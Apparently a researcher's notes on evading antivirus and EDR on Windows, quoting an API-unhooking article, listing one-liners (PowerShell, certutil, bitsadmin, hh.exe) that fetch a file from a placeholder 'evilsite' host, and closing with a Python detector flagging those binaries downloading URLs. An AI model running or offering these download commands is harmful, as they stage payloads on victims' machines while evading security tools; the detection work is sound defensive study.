Trying to read up on this for some work things. Dropping a few links here. Will add more notes as I go on.
——————————————————————
bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis
“””
It’s worth noting that not all the functions get hijacked by AVs/EDRs. Usually only those functions that are known to be abused over and over again in the wild get hooked – think CreateRemoteThread, NtQueueApcThread and similar.
“””
This led me to this article: Old School Evil Excel 4 Macros
——————————————————————
Somehow ended up here: Alternate Download Ideas
- powershell.exe -ep bypass Invoke-WebRequest -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
- powershell.exe -ep bypass Invoke-RestMethod -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
- powershell.exe -ep bypass Start-BitsTransfer -Source http://evilsite:port/evilfile -Destination c:\temp\evilfile
- certutil.exe -urlcache -split -f "http://evilsite:port/evilfile" c:\temp\evilfile
- bitsadmin /transfer myDownloadJob /download /priority normal http://evilsite:port/evilfile c:\temp\evilfile
- hh.exe "http://evilsite/evilfile"
——————————————————————
Then I started digging more into this, as I probably should have from the beginning; LOL bins
“””
Right now there are:
- Bitsadmin.exe
- Certutil.exe
- Esentutl.exe
- Expand.exe
- Extrac32.exe
- Findstr.exe
- Hh.exe
- Ieexec.exe
- Makecab.exe
- Replace.exe for Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 and the equivalent Server versions.
“””
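A defender-side check that ties the download commands above to the LOLBins list: an added example, not code from this note or from any of the linked posts, that scans process-creation records for the listed binaries fetching a URL. The `image|commandline` record format, the hosts and paths in the sample events are constructed; the `iwr`/`irm` aliases are an assumption beyond the quoted commands.

```python
"""Flag process-creation events in which one of the Windows binaries listed above
is used to pull a file from a URL. The log format (image|commandline) is a
constructed stand-in for a Sysmon/4688-style process creation record."""
import re
from typing import Dict, List, Tuple

# Binaries from the LOLBins list and the download commands on this page.
WATCHED = {"bitsadmin.exe", "certutil.exe", "esentutl.exe", "expand.exe",
           "extrac32.exe", "findstr.exe", "hh.exe", "ieexec.exe",
           "makecab.exe", "replace.exe", "powershell.exe"}
# Switches/cmdlets taken from the quoted commands; iwr/irm aliases are an assumption.
SPECIFIC = {
    "certutil.exe": re.compile(r"-urlcache\b", re.I),
    "bitsadmin.exe": re.compile(r"/transfer\b", re.I),
    "powershell.exe": re.compile(
        r"\b(Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|iwr|irm)\b", re.I),
}
URL = re.compile(r"https?://[^\s\"']+", re.I)

def parse_event(line: str) -> Dict[str, str]:
    """Split 'image|commandline' and reduce the image path to its file name."""
    image, _, cmdline = line.partition("|")
    return {"image": image.strip().rsplit("\\", 1)[-1].lower(),
            "cmdline": cmdline.strip()}

def classify(event: Dict[str, str]) -> str:
    """'specific' = known download switch + URL; 'generic' = watched binary + URL."""
    image, cmdline = event["image"], event["cmdline"]
    if image not in WATCHED or not URL.search(cmdline):
        return ""
    pat = SPECIFIC.get(image)
    return "specific" if pat and pat.search(cmdline) else "generic"

def find_download_lolbins(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (image, verdict, url) for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict:
            hits.append((ev["image"], verdict, URL.search(ev["cmdline"]).group(0)))
    return hits

# Constructed sample events; hosts and paths are placeholders.
SAMPLE_LOG = [
    r'C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f "http://files.example.test/p.bin" c:\temp\p.bin',
    r'C:\Windows\System32\certutil.exe|certutil.exe -hashfile c:\temp\setup.msi SHA256',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ep bypass Invoke-WebRequest -Uri http://files.example.test/a.ps1 -OutFile c:\temp\a.ps1',
    r'C:\Windows\hh.exe|hh.exe "http://files.example.test/help.chm"',
    r'C:\Windows\System32\notepad.exe|notepad.exe http://files.example.test/readme.txt',
]

if __name__ == "__main__":
    for hit in find_download_lolbins(SAMPLE_LOG):
        print(hit)
```

The "generic" verdict (a listed binary given a URL with no known download switch) is noisier than "specific" and is meant for triage, not blocking.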